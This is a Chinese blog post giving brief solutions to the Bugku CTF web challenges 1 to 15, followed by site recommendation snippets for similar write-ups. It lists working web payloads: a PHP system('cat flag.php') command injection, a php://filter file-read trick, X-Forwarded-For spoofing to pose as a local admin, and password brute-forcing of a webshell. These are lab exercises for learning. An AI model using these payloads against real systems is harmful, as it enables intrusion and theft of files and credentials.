Bugku_web1-15

最新推荐文章于 2024-05-11 02:11:37 发布
最新推荐文章于 2024-05-11 02:11:37 发布
阅读量179 收藏
点赞数
分类专栏: Bugku
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45882317/article/details/112195650
版权

0x01 web1

payload:F12

0x02 web2

payload:F12->Elements->右键修改为maxlength="2"

0x03 web3

payload:http://114.67.246.176:12552/?what=flag

0x04 web4

payload:以post方式传参

0x05 web5

payload:?num=1a

0x06 web6

站长工具中Unicode转ASCII
f

0x01 web7

抓包,重复发送,有一个就是flag

0x01 web8

payload:"".system('cat flag.php')

0x01 web9

$GLOBALS的作用是:引用全局作用域中可用的全部变量,变量的名字就是数组的键。
var_dump()函数 显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。

payload:?args=GLOBALS

0x0A web10

抓包看响应头

0x0B web11

扫描得shell.php,爆破密码为hack

0x0C web12

源代码中有base64,解密得密码,用户名为admin,发送请求时加上X-Forwarded-For:127.0.0.1【本地管理员】

0x0D web13

查看源代码发现js代码,改eval为alert,执行后复制弹出的代码,观察可得复制if中的值到框中即可拿flag

0x0Eweb14

payload:file=php://filter/read=convert.base64-encode/resource=index.phpbase64解码即可

0x0F web15

5位数爆破,12468

ScyLamb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【BugKu-web】inspect-me
weixin_73625393的博客
10-23 144
1.启动场景2.按F12查看源代码,找flag值3.flag为:shellmates{CLA$SI1111C_ch4l1enGE}
bugku web题集锦
skysys的研究小屋
06-01 1232
变量1 <?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ die("args error!"); } eval("var_dump($$args);"); } ?> 正则在线测试:ht
2024年最全CTF BugKu平台—(Web篇①)_ctf bugku web(1),金三银四我带你去BAT面试现场
最新发布
2401_84281698的博客
05-11 666
白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!即num既不能是数字字符,但是要等于1,我们可以想到用科学计数法表示数字1,既不是纯数字,其值又等于1因此。这里的sign显示是加密的。这里是zMNTA,这里我好几次都是zM开头的 ==结束的,查看源代码。弱密码top1000?是一个弹窗 F12 找到一些线索,估计是编码,看了一下下面的评论知道是Unicode编码。通过url传入what的值,让其等于flag,直接构造url就得到flag。
【愚公系列】2023年06月 Bugku-Web(头等舱)
时光隧道
06-27 2690
Burp Suite是一款用于Web应用程序渗透测试的集成工具,它由PortSwigger Ltd.开发。Burp Suite包含了多个模块,可以进行代理、扫描、目录爆破、爬虫等操作。以下是Burp Suite的主要功能:代理:Burp Suite充当代理服务器,使用户可以拦截和修改在浏览器和Web服务器之间传输的数据。扫描:Burp Suite可以扫描Web应用程序中存在的各种漏洞情况(如SQL注入、XSS等)。目录爆破:Burp Suite可以自动化地枚举Web应用程序中隐藏的文件和目录。
bugku - Web
UP's blog
09-03 2020
刚刚入门CTF,如有错误,望大佬指教
【愚公系列】2023年06月 Bugku-Web(bp)
时光隧道
06-26 5770
Burpsuite是一个流行的网络应用程序安全测试工具,常用于发现应用程序中的漏洞和进行渗透测试。其中,密码爆破是其常用的功能之一。使用Burpsuite进行密码爆破的步骤如下:打开Burpsuite,将浏览器的代理设置为Burpsuite,以方便抓取请求。登录目标网站,记录下登录请求的URL,请求方法(通常是POST)、请求头、Cookie等信息。
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
BWVS.rar_BWVS bugku_vulnerability
09-23
Bugku Web Vulnerability System
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
apachecn#apachecn-ctf-wiki#BugkuCTF-WEB解题记录-11-15_weixin_3069946
07-25
BugkuCTF WEB解题记录 11-15_weixin_30699463的博客-CSDN博客来源:
bugku题的web类解析
01-29
这个是我自习写的bugku的web的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
bugku--web
lulu001128的博客
04-20 201
解题过程
BUGKU--web
lulu001128的博客
04-17 111
解题过程
BUGKU-WEB 文件包含
天泽岁月
02-22 1314
BUGKU-WEB 文件包含,PHP伪协议
BUGKU-WEB
wojiushilsy的博客
02-22 486
5.矛盾 打开链接,内容如下: $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } is_numeric():检测字符串是否只由数字组成,如果字符串中只包括数字,就返回Ture,否则返回False。(注意是只包括数字) 要求我们不能输入纯数字1,但是num...
【愚公系列】2023年06月 Bugku-Web(留言板)
时光隧道
06-23 6967
使用dirsearch进行目录爆破的步骤如下:下载dirsearch工具:可以从Github上下载dirsearch,或者使用命令行工具进行安装。打开dirsearch工具:在命令行中输入python3 dirsearch.py命令,即可打开dirsearch工具。设置目标URL:在命令行中输入目标URL,例如:python3 dirsearch.py -u http://example.com。
Bugku_web_从零开始(一)
weixin_43727482的博客
01-13 279
Bugku_web_从零开始 从零开始; 000 web2:听说聪明的人都能找到答案 右键检查元素得到flag; 001 计算器 输入计算结果的时候发现只能输入一个数字,右键审查元素,改一下input标签长度;输入正确结果得到flag; 002 web基础$_GET 审查代码可知使用get方法传参使得 $what=='flag';get方法可直接在url上构造“http://123.206...
Bugku_web(一)
weixin_44087538的博客
03-26 432
根据您之前提到的代码片段,当$num被赋值为'1abc'时,is_numeric($num)会返回true,因为'1abc'包含一个有效的数字开头。需要注意的是,POST请求没有长度限制,因此可以传输大量数据,但也需要注意数据的编码和格式,以确保服务器能够正确解析和处理。在解题过程中,保持冷静和专注,不断尝试和学习,你会逐渐提高自己的解题能力。,最终都是index.php,如果文件夹下没有index页,就会列出当前目录下所有文件,这个就比较危险了,当然,可以通过服务器设置权限,避免被人看到你的网站结构。
Bugku CTF web15(Web)
ChaoYue_miku的博客
02-26 504
0、打开网页,发现要输入五位数密码 1、使用BrupSuite抓包,发送给intruder准备爆破 5位数需要爆破100000个数,耐心等待 2、经过一段时间,爆破得到密码:12468 3、输入查看密码12468并提交查看 4、得到flag:flag{a5838736c09d155c4536de69c3a4b4d5} ...
bugku s1 awd排位赛-12
08-07
bugku s1 awd排位赛-12是Bugku安全平台上举办的一场AWD(Attack and Defense)排位赛的第12轮比赛。Bugku是一个致力于网络安全技术研究和交流的平台,这场比赛的目的是为了检验参赛者在攻击和防御方面的技术实力。 在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值